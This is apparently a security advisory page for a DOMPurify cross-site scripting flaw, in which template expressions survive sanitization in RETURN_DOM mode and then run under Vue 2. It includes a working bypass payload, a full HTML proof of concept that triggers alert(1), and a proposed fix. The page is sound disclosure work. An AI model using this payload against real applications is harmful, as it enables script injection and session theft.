DOMPurify CVE-2026-41239
MEDIUM
GHSA-crv5-9vww-q3g8
CVSS VectorNVD
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
Lifecycle Timeline
1Blast Radius
ecosystem impact- 6 npm packages depend on dompurify (4 direct, 2 indirect)
Ecosystem-wide dependent count for version 1.0.10.
DescriptionNVD
Summary
| Field | Value | |:------|:------| | Severity | Medium | | Affected | DOMPurify main at 883ac15, introduced in v1.0.10 (7fc196db) |
SAFE_FOR_TEMPLATES strips {{...}} expressions from untrusted HTML. This works in string mode but not with RETURN_DOM or RETURN_DOM_FRAGMENT, allowing XSS via template-evaluating frameworks like Vue 2.
Technical Details
DOMPurify strips template expressions in two passes:
- Per-node - each text node is checked during the tree walk (
purify.ts:1179-1191):
// pass #1: runs on every text node during tree walk
if (SAFE_FOR_TEMPLATES && currentNode.nodeType === NODE_TYPE.text) {
content = currentNode.textContent;
content = content.replace(MUSTACHE_EXPR, ' '); // {{...}} -> ' '
content = content.replace(ERB_EXPR, ' '); // <%...%> -> ' '
content = content.replace(TMPLIT_EXPR, ' '); // ${... -> ' '
currentNode.textContent = content;
}- Final string scrub - after serialization, the full HTML string is scrubbed again (
purify.ts:1679-1683). This is the safety net that catches expressions that only form after the DOM settles.
The RETURN_DOM path returns before pass #2 ever runs (purify.ts:1637-1661):
// purify.ts (simplified)
if (RETURN_DOM) {
// ... build returnNode ...
return returnNode; // <-- exits here, pass #2 never runs
}
// pass #2: only reached by string-mode callers
if (SAFE_FOR_TEMPLATES) {
serializedHTML = serializedHTML.replace(MUSTACHE_EXPR, ' ');
}
return serializedHTML;The payload {<foo></foo>{constructor.constructor('alert(1)')()}<foo></foo>} exploits this:
- Parser creates:
TEXT("{")→<foo>→TEXT("{payload}")→<foo>→TEXT("}")- no single node contains{{, so pass #1 misses it <foo>is not allowed, so DOMPurify removes it but keeps surrounding text- The three text nodes are now adjacent -
.outerHTMLreads them as{{payload}}, which Vue 2 compiles and executes
Reproduce
Open the following html in any browser and alert(1) pops up.
<!DOCTYPE html>
<html>
<body>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/vue.min.js"></script>
<script>
var dirty = '<div id="app">{<foo></foo>{constructor.constructor("alert(1)")()}<foo></foo>}</div>';
var dom = DOMPurify.sanitize(dirty, { SAFE_FOR_TEMPLATES: true, RETURN_DOM: true });
document.body.appendChild(dom.firstChild);
new Vue({ el: '#app' });
</script>
</body>
</html>Impact
Any application that sanitizes attacker-controlled HTML with SAFE_FOR_TEMPLATES: true and RETURN_DOM: true (or RETURN_DOM_FRAGMENT: true), then mounts the result into a template-evaluating framework, is vulnerable to XSS.
Recommendations
Fix
normalize() merges the split text nodes, then the same regex from the string path catches the expression. Placed before the fragment logic, this fixes both RETURN_DOM and RETURN_DOM_FRAGMENT.
if (RETURN_DOM) {
+ if (SAFE_FOR_TEMPLATES) {
+ body.normalize();
+ let html = body.innerHTML;
+ arrayForEach([MUSTACHE_EXPR, ERB_EXPR, TMPLIT_EXPR], (expr: RegExp) => {
+ html = stringReplace(html, expr, ' ');
+ });
+ body.innerHTML = html;
+ }
+
if (RETURN_DOM_FRAGMENT) {
returnNode = createDocumentFragment.call(body.ownerDocument);AnalysisAI
Cross-site scripting (XSS) in DOMPurify when using SAFE_FOR_TEMPLATES with RETURN_DOM or RETURN_DOM_FRAGMENT modes allows remote attackers to execute arbitrary JavaScript by crafting malformed HTML that reassembles into template expressions after DOM normalization. The vulnerability affects DOMPurify from v1.0.10 through at least v3.3.3, exploitable when sanitized output is mounted into template-evaluating frameworks like Vue 2. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Share
External POC / Exploit Code
Leaving vuln.today